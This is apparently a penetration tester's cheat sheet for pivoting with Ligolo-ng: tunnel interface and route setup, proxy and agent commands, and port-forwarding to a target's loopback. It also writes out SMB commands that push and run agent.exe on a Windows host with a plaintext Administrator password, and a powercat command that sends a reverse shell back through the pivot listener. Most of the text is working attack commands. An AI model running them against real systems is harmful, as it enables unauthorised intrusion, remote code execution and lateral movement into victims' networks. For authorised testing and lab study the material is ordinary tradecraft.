Ligolo-ng

Pivoting

1. Interface Setup

Create and activate a new tunnel interface for ligolo :

# Create the interface
sudo ip tuntap add user kali mode tun ligolo
# Activate the interface
sudo ip link set ligolo up

On Ligolo-ng >= v0.6, this can be done in a single step:

ligolo-ng » interface_create --name ligolo
INFO[0006] Creating a new "ligolo" interface...
INFO[0006] Interface created!
ligolo-ng » interface_list
┌───────────────────────────┐
│ Available tuntaps         │
├───┬──────────┬────────────┤
│ # │ TAP NAME │ DST ROUTES │
├───┼──────────┼────────────┤
│ 0 │ ligolo   │            │
└───┴──────────┴────────────┘

2. Proxy

When the environment has no internet availability, e.g. CTFs, practice labs, etc.:

./proxy -selfcert

When there is internet available on the environment, e.g. on an actual test environment:

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval.

./proxy -autocert

3. Agent

From the target machine:

# When -autocert is used on the proxy
./agent -connect 10.129.204.146:11601
# When -selfcert is used on the proxy
./agent -connect 10.129.204.146:11601 -ignore-cert

4. Interact

asd

# List active sessions
ligolo-ng » session
# List interfaces of the target machine
[Agent : pivot@pivot-machine] >> ifconfig

5. Routes

Add a route to the target network:

sudo ip route add 172.16.10.0/24 dev ligolo

On Ligolo-ng (>= 0.6) this can be done internally:

ligolo-ng » interface_add_route --name ligolo --route 172.16.10.0/24
INFO[3206] Route created.       

Finally, start the tunnel:

[Agent : pivot@pivot-machine] >> tunnel_start

Now, we can reach the 172.16.10.0/24 network from our Kali:

$ sudo nmap 172.16.10.0/24 -T4

Port-Forward

1. Routing

To access local ports on the connected agent, ligolo-ng uses a hardcoded "magic" CIDR: 240.0.0.0/4:

$ sudo ip route add 240.0.0.1/32 dev ligolo

2. Interact

Now, any IP queried in this unused subnet is automatically redirected to the agent's 127.0.0.1. For instance, the below scan will scan the target's loopback address (127.0.0.1):

$ nmap 240.0.0.1

Agent Transfer & Execution

We don't need elevated privileges on the target to use the ligolo-agent.

Transfer

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth --put-file 'agent.exe' '\Windows\Temp\agent.exe'

Execute

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth -x '\Windows\Temp\agent.exe -connect 10.10.15.223:11601 -ignore-cert'

Reverse Shell

We have a route to the target network, but the target network does not have a route to our attack host. Thus, if we want to catch a reverse shell from a target other than the pivot host:

1. Listener Setup

Create a listener on the agent/pivot host (0.0.0.0:3000) that will redirect the traffic to our proxy/attack host (127.0.0.1:10000).

[Agent : pivot@pivot-machine] >> listener_add --addr 0.0.0.0:3000 --to 127.0.0.1:10000 --tcp
INFO[0373] Listener 0 created on remote agent!

Start listening from our attack host:

$ nc -lvnp 10000
listening on [any] 10000...

2. Connect from Target

Connect from the target to the pivot machine (10.1.2.4) on the listening port (30000):

> powercat -c 10.1.2.4 -p 30000 -ep

This will connect to the agent's listener and then forwarded to our proxy:

$ nc -lvnp 10000
listening on [any] 10000...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]
...
PS C:\Users\User>

Resources

Documentation

Introduction - Ligolo-ng Documentation

Repo

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

Video Demo